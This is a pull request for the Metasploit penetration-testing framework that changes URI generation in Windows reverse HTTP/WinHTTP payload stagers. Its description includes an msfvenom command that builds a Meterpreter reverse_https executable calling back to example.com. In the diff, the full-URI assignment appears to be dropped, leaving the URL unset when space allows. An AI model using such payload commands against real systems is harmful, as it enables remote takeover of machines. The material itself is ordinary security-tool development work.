### PR TITLE
Fix #5662 by not generating a small uri by default

### DIFF
--- a/lib/msf/core/payload/uuid/options.rb
+++ b/lib/msf/core/payload/uuid/options.rb
@@ -36,7 +36,7 @@ module Msf::Payload::UUID::Options
     # The URI length may not have room for an embedded UUID
     if len && len < URI_CHECKSUM_UUID_MIN_LEN
       # Throw an error if the user set a seed, but there is no room for it
-      if datastore['PayloadUUIDSeed'].to_s.length > 0 ||datastore['PayloadUUIDRaw'].to_s.length > 0
+      if datastore['PayloadUUIDSeed'].to_s.length > 0 || datastore['PayloadUUIDRaw'].to_s.length > 0
         raise ArgumentError, "A PayloadUUIDSeed or PayloadUUIDRaw value was specified, but this payload doesn't have enough room for a UUID"
       end
       return "/" + generate_uri_checksum(sum, len, prefix="")

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      
+
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']

--- a/lib/msf/core/payload/windows/reverse_http.rb
+++ b/lib/msf/core/payload/windows/reverse_http.rb
@@ -46,13 +46,12 @@ module Payload::Windows::ReverseHttp
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
     # Add extra options if we have enough space
     unless self.available_space.nil? || required_space > self.available_space
-      conf[:url]        = generate_uri
+      
       conf[:exitfunk]   = datastore['EXITFUNC']
       conf[:ua]         = datastore['MeterpreterUserAgent']
       conf[:proxy_host] = datastore['PayloadProxyHost']
@@ -60,6 +59,9 @@ module Payload::Windows::ReverseHttp
       conf[:proxy_user] = datastore['PayloadProxyUser']
       conf[:proxy_pass] = datastore['PayloadProxyPass']
       conf[:proxy_type] = datastore['PayloadProxyType']
+    else
+    # Otherwise default to small URIs
+      conf[:url]        = generate_small_uri
     end
 
     generate_reverse_http(conf)

--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -27,7 +27,6 @@ module Payload::Windows::ReverseWinHttp
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
@@ -42,6 +41,9 @@ module Payload::Windows::ReverseWinHttp
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
       conf[:retry_count]      = datastore['StagerRetryCount']
+    else
+    # Otherwise default to small URIs
+      conf[:url]              = generate_small_uri
     end
 
     generate_reverse_winhttp(conf)

--- a/lib/msf/core/payload/windows/x64/reverse_http.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_http.rb
@@ -50,7 +50,6 @@ module Payload::Windows::ReverseHttp_x64
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
@@ -64,6 +63,9 @@ module Payload::Windows::ReverseHttp_x64
       conf[:proxy_user] = datastore['PayloadProxyUser']
       conf[:proxy_pass] = datastore['PayloadProxyPass']
       conf[:proxy_type] = datastore['PayloadProxyType']
+     else
+    # Otherwise default to small URIs
+      conf[:url]        = generate_small_uri
     end
 
     generate_reverse_http(conf)

--- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb
@@ -24,7 +24,6 @@ module Payload::Windows::ReverseWinHttp_x64
       ssl:         opts[:ssl] || false,
       host:        datastore['LHOST'],
       port:        datastore['LPORT'],
-      url:         generate_small_uri,
       retry_count: datastore['StagerRetryCount']
     }
 
@@ -38,6 +37,9 @@ module Payload::Windows::ReverseWinHttp_x64
       conf[:proxy_user]       = datastore['PayloadProxyUser']
       conf[:proxy_pass]       = datastore['PayloadProxyPass']
       conf[:proxy_type]       = datastore['PayloadProxyType']
+    else
+    # Otherwise default to small URIs
+      conf[:url]              = generate_small_uri
     end
 
     generate_reverse_winhttp(conf)


### PR DESCRIPTION
With this patch, msfvenom can generate payloads with specified UUIDs again:

```
./msfvenom -p windows/meterpreter/reverse_https LHOST=example.com LPORT=4444 PayloadUUIDSeed=ShellsAreDelicious -f exe -o payload.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 345 bytes
Saved as: payload.exe

```
